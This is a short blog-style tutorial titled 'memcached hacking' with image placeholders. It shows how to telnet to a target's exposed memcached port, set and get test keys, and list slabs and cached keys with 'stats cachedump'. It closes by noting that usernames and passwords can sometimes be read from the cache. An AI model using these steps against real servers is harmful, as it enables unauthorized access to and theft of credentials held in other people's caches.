1,Test:

telnet target port

stats:check the information

memcached hacking_第1张图片

set pnig0s 0 0 10

pnig0s1992

get pnig0s

if echo "stored" then it works well.

memcached hacking_第2张图片

stats slabs:lis all slabs of this memcached sever.

memcached hacking_第3张图片

stats detail on:make the memcached listed all details of each slab.

stats cachedump [slab's ID] [echo amount]

memcached hacking_第4张图片

now,u got the name of items,u can use get [name] to check it.

username & password sometimes can be found in the cache.good luck!